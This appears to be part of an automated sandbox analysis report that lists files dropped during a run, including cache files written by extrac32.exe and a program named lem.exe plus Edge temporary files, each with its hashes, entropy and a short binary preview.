                                                                                                                                                                                                                                                                                                  SHA-512:349F6CBDC8F3B0FF07D3D1930B6FB96D6F2D88E073DD70491F5380CECEC05080A81E3B77F8004692F04D50A975666E31086BEA8E226FB46A6368E3B16D516DC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....p/.....;u3......pm2...i.;..|.]<q.....".T,.G...G.I.[=.x...s........#.l6...!'...+.YN^.q....3.vdb..;9.3..P.)....h..<:@"..;.\......;Z..T.f....#..0FE.@..;(..x....y...v..t.g...#.}...f..Gwu...^.!..B.y.op..,.....".A.0F....4...!.?..6...T.+...+..GC<6..Ho...t.:B.....px8M.oz/...Y.>..Z......,..$.@ .#"O.q'.|y.....d...s...&O....p'-.w#....<..H_.#H3!.Z....'...".t(../.XZZ.`O.Swz..{.7..w..:..S.{.b....d.....@&....\..s..;5[...X...f.........N\..F.SWgY,x....tG.'..b.F.\.....<>.C*..2.o..V..~u..j.~.y.f...D.KD..mN\..|u.....L.qb_7.p.E..>.=.... ......yn8.........E..l.GU....W[.mN].qCY.i.m......{..G.7.X[......yG....V...Y'......\..~<.....G..c....\.V. .7.#..........d..F{......6\._.s-....:..L."....u..T.3..n.w{.@:...3$#...S...x/.mX.(...9.fX."r\D..D..\..>..s.*/Od9yi.[..x..g.....]..#.3y.h...;....p.......<.|.f.#....?...>*..7..w5$...t.oG.i2C...<>.C&...z...g.;......lz.G.~...u.|~..e7g.74...<....&l.5.a.;.C#..Z.R..l...ef..x.wI...l.>.C........=..;.#....H'Z...BA.G....hw.\..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sunglasses

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.716538385178715
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:CUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVmoT:CxlHS3NxrHSBRtNPnj0nEoXnmK
                                                                                                                                                                                                                                                                                                  MD5:0B4EA7C4E70CFAC855BF4D7C0288E2BE
                                                                                                                                                                                                                                                                                                  SHA1:36430F5AD2C7964DFBD3B78921FE71FD89AAF575
                                                                                                                                                                                                                                                                                                  SHA-256:047C2EF53D55A7E575D02A23FDE3E8DA6C6D51A2504231BD4AD33B3E0824A3EE
                                                                                                                                                                                                                                                                                                  SHA-512:C04298BE87BF00CB3CADA0F302E80C8C8B5A0E9F1C0017B7B80B70040392136F209CC391B728F1905F36CB8406019C5370E7FC3043158523EFF0D9DC4CA5C071
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..LE..ME..ME..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..NE...@...@..IE...@..NE..JE.&JE..OE..OE.<JE..OE...@...@.FOE...@.jOE..OE..OE..OE..OE..OE..K....M.;.......P..k.............c....$..cE.......R...P.T$hj..3.|.3....=....N..i..j..e.3....'..........j..P...p..O......j..3.>..........Q.....................j........3...........i..j.V..........N....M.;......P.:j.......r.....;...&...W..j.......Q.....F..F.....................$..dE...........P.T$hj..6.>.............t}.K..h..j..h....tk.......j..W...p..P......j..6.........`.........V...Q.....K.........A.....j....6.......t.....h..j.S.......\$$......L$,.........*...T$(.D....L$,....P....,...E../...h..M..L$0.D$...........u..E....@.....L$,.8.X............F......>.^.......K....M.;......P.h..........L$,.0.g.............!....@......h..M..L$0.D$......o....}..u....V..D..f.x.G..........\$(......$.....A...$.....A...$.....A....$........$....P

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tired

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97040
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998385944090606
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HgHymtPnJHvGNKNEahCqR+aCC9/uJX0Ze6Us+NeaeUxwSJqy2CRrRW/VVnS3YPDv:cycPhvGNWhTK4mXxNwHJ8qCeFAc86pSQ
                                                                                                                                                                                                                                                                                                  MD5:530245F3720C5A7DDD0567A546420A30
                                                                                                                                                                                                                                                                                                  SHA1:D5B8167F667D02398531C1CCE326509CB01E86E6
                                                                                                                                                                                                                                                                                                  SHA-256:B8D55ACFB72DB731DD7D1FC4FFD68B1E047E3C4CB07109BEC40B72EC4B6903DB
                                                                                                                                                                                                                                                                                                  SHA-512:B06FA89ABCD6913E253D7F86DC312089F7077C9F2E638DFFD27AE3849C897AE46DC3D3BA659AAF88D8A369C395D27BEA03B67B98442E9C4C925F502552606BB9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Q ..#....&o...W.:.6...U..#E.2.....z+a.(..-.W...7.,.|.C<L.9lq/Pr......Hr...-.7z.6!..3......e.....qo..h0..zg./....:...&ld.R|..z ..&L#...M....zRv..E'{..X.}."...7.d.....q:.{.,.)..b.}-.k.......+...ms.<..89)N[.?.x.v.%`dx(.C......W..i ^vux..A~n..b.<....9....>..S..^.S.z...ZP...}....#..m.o,.#~uO...b.s.FN..o;.?9p...n..Z.N...........k..Xy....m.:....@._..K.z....G....#3.*.)&q..$...SbF3.$..P5+3....:.....Pi)K.U..............N._F..g..s.1#....,;}.#......Y......Xp..s...3..............[.....x..1z1.c..A.8T....S....g...@|9..D.F......F.s...G.J.....hC.`...!.+R.IMT..0.e|..FX.....$.T.|.S.5._.*XR..........{..ez.F.[...........Rj.;..a..p$1x....[r.u..<.......6?..G0.?..a...S.((?..eq...j5.U....8..8....Dg..!.t@..B8*.].iW...CW...w.F....y.9w.. .....i....O......q-..~I........^v.|.d..].%].....!.%.S..b+W.% ..Zp.......%.c|GC...G..r........ln..;L.NP.a.:.8^....+...%.<..._*...Gl........)..y......W.8. ..J..L...*..RW"b# d3../.X9.....J..=..T..c5H.P..0...u..b\w.:..L.Q..3(.b_|...D...

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tulsa

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.583824448269045
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:i+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coF:imVnjphfhnvO5bLezWWt/Dd314V14Zgt
                                                                                                                                                                                                                                                                                                  MD5:B655E394756A3AFA8CEC8800C5D1FB8B
                                                                                                                                                                                                                                                                                                  SHA1:F058CB3583B851FB272B9B0768FCEE865F78E486
                                                                                                                                                                                                                                                                                                  SHA-256:638B1FA5EFB53EFA1EB2160A5DD443D8F12614F29EBF9C1B04C7B2E59BE23A63
                                                                                                                                                                                                                                                                                                  SHA-512:03B9A541DBE3010C62867949D5B42625662E2EB215CCAA369533F3F7F128B4E2E368F47F1B5DB4ED3FCFAF213147BFBFAD3512D84242DCC169DB5620058933CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.3.t$D...,%M..\$8.\$@.\$..\$ .t$$.D$(..I..\$,.\$0.\$4.L$.8.0)M........}...+.tF...t+...t....uU.L$..d#...t$$.|$..B.L$..Q#...E....L$..C#...E..t$$.D$....5.)M..L$..'#...t$.3..D$$....F.D$.P.L$,.j....L$....0)M.A.L$.;...p....|$.Q.D$..\$.PQS.D$H.0$M.P.D$<Ph )M..e*....t.95,%M.t..=,%M.8\$.t<.L$8......L$(.D$(..I..)....t$,.p=..Y.L$.."...L$8.y"...../.L$(.D$(..I.......t$,.?=..Y.L$..Q"...L$8.H"..3._^[..]...U......<SV3.W.=,%M.F.|$.;........=g#M.........u.3.0$M...,%M.......L$..y....~....\$8.\$@.t$D.\$..\$ .t$$.D$(..I..\$,.\$0.\$49Y.~y....+.t=...t&...t....uF.L$..!...E..,.L$..!...E....L$..}!...E..t$$...L$..k!...E..D$$.....D$..D$.P.L$,....D$.G;x.|..|$.Q.D$..\$.PQS.D$H.0$M.P.D$<P.u..(....t795,%M.t/.|$D..=,%M.uU.L$8......D$@h.~L..0....YY..u6j.[..L$(.D$(..I..c....t$,.;..Y.L$.. ...L$8. .....E8\$.t..L$8.....M....L$(.D$(..I.......t$,.c;..Y.L$..u ...L$8.l ..3._^[..]...U..S.].V..W....K..C..F...tP...s.j.X3.F.j.Z.........Q..;..3..F.Y9~.v.j...:..Y.K.........J..H..N....G;~.r...3..~..~._..^[]...U

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Webster

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):129024
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.685566394532451
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:pAU4CE0Imbi80PtCZEMnVIPPBxT/sZydTmS:pAhClbfSCOMVIPPL/sZg
                                                                                                                                                                                                                                                                                                  MD5:1FA2AC3ECE7FD9A15C18981315729898
                                                                                                                                                                                                                                                                                                  SHA1:1477784CCA6FED096A2928C9DDDC38AB001905D1
                                                                                                                                                                                                                                                                                                  SHA-256:2EC359B827914240FD5094E64A16B4AC392C193BF1DA4D19395ED72779F91685
                                                                                                                                                                                                                                                                                                  SHA-512:2152DCB3F7004F1F78446D7AE0A65C6928C56E29DC474F80575FA7CCA450C546F3366539D97276B98FBBD0E4E6B04EB37FF1C167F32B797D78106C99B38EAAF1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:..I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh........I..u.........tLj.......+.QP........P..........I...t'............;.r..+E..F.;.....s.3..N.....0.I....M..._^3.[......].j.hh.L..c....u....u...... ........................;5.!M...............?k.0.M......M...D.(...tiV."...Y....}.e.......M..M..D.(.u...........r.... ....u..u.V.G.........}..E.............).u..}.V.x...Y..6.... ..A..........I............U...0...L.3.E..M..M.V.u.W.}..}..u.3........u.....!8......................S........?k.0.].....M..E.U.\.)...t....u(.....u..... ...............Q.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\106a194f-863f-4f76-96ad-d89678e5afe5.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):31335
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                  MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                  SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                  SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                  SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\49e6be07-b214-4594-b93d-a87922113c0e.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4c0b1246-7d5f-4076-9ad8-5af41070cea9.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\681ba29c-5db2-4d4b-a422-ea35e2f2a6a4.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2110
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.399061735884073
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rr5:8e2Fa116uCntc5toYM5M
                                                                                                                                                                                                                                                                                                  MD5:F6612917962199F6F9A40D07879D0D78
                                                                                                                                                                                                                                                                                                  SHA1:C5FC028A0F4D9449C9C684759BB7A23E6F616A81
                                                                                                                                                                                                                                                                                                  SHA-256:A2B112D62F29DC6890783B8C1D46FD2B8895C04FC14AB095E35569FE1F8B19B6
                                                                                                                                                                                                                                                                                                  SHA-512:4C0D1F541D7DABC16948A551824077EC195F6CFCF723AEB2FC5BB0F881A8461E3749DC2507416412F864C333C208F4A56FF4B68F9EFD0523BDE7C26CC57C51CB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\e9cb0f59-ecea-4512-8c39-b3737b98084a.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\ff3e3344-6687-4fa1-811e-c9fc84de5556.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):103855
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.924096864897051
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:v5z/M7to/iGyQVUdJpABfSi77IbHZ0PmFKiri:vqeiGyQVUd0Bf77cZPdi
                                                                                                                                                                                                                                                                                                  MD5:75C914BA3F4FDD5FF0CEC899811B7519
                                                                                                                                                                                                                                                                                                  SHA1:27F398E65EAF24FC377F13326FD7A7283697E48F
                                                                                                                                                                                                                                                                                                  SHA-256:91870F6B76792B81181CC7597CB6CAC14DD8281AD1527F75460BA2C9AEF08A0C
                                                                                                                                                                                                                                                                                                  SHA-512:DBD94BB300639340F75A782B916298805DAC1B6F9881CC49DBB4088CC53FF2F433767092F76974BDA73200898BF8D0891D2396CB9403D3AC21371E35284F91B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\49e6be07-b214-4594-b93d-a87922113c0e.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
